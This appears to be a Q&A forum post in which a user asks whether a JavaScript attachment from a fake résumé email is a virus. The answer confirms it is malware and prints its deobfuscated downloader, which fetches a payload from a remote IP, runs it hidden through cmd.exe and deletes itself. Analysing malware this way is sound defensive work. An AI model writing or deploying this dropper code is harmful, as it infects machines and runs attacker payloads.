How can I know if there is a javascript virus?

347    Asked by AndrewJenkins in Java , Asked on Mar 10, 2022

 So I got a random email saying this. Looks very automated:

"How are things? I was visting your website on 4/9/2016 and I'm very interested. I'm currently looking for work either full time or as a intern to get experience in the field. Please review my Resume and let me know what you think.


Then a javascript file attached. I scanned it on VirusTotal finding only 1/55. I have opened the file to look at the text and have copy pasted it into this dump file as it is quite long. Anyone familiar with javascript can confirm that it is a virus or not?

Answered by Amit raj

It most certainly is a javascript virus. It uses JavaScript with ActiveX* and VBScript to download and execute a stage two payload that does something else. Although it is written in JavaScript, it is not executed in the browser. Instead, it is executed in the Windows Script Host when it is double-clicked. This is the deobfuscated and abridged version of the function sQl dib from the file:


// download and execute stage 2 payload

function stage1_payload() {
    // connect to server hosting stage 2 payload and download into memory
    var http_obj = new ActiveXObject("MSXML2.XMLHTTP");
    http_obj['open']("GET", "http://94.102.63.7/macbook_tutorial.mov", false);
    http_obj['send']();
    // evaluates true only if http connection succeeded
    if (http_obj['Status'] == 200) {
        // open activex objects for filesystem and file access
        var fs_obj = new ActiveXObject("Scripting.FileSystemObject");
        var file_obj = new ActiveXObject("ADODB.Stream");
        // create and open temporary file (as binary) in system temporary folder
        var temp_file = fs_obj['GetSpecialFolder'](2) + '' + fs_obj['GetTempName']();
        file_obj['Open']();
        file_obj['Type'] = 1;
        // save response body containing stage 2 payload to temporary file
        file_obj['Write'](http_obj['ResponseBody']);
        file_obj['Position'] = 0;
        file_obj['SaveToFile'](temp_file);
        file_obj['Close']();
        // execute temporary file using command prompt
        var shell_obj = new ActiveXObject("WScript.Shell");
        shell_obj['run']('cmd.exe /c ' + temp_file, 0);
    }
    // delete currently-executing script (the js file you received)
    var script_name = WScript['ScriptFullName'];
    fs_obj['deleteFile'](script_name);
}


Your Answer

Interviews

Parent Categories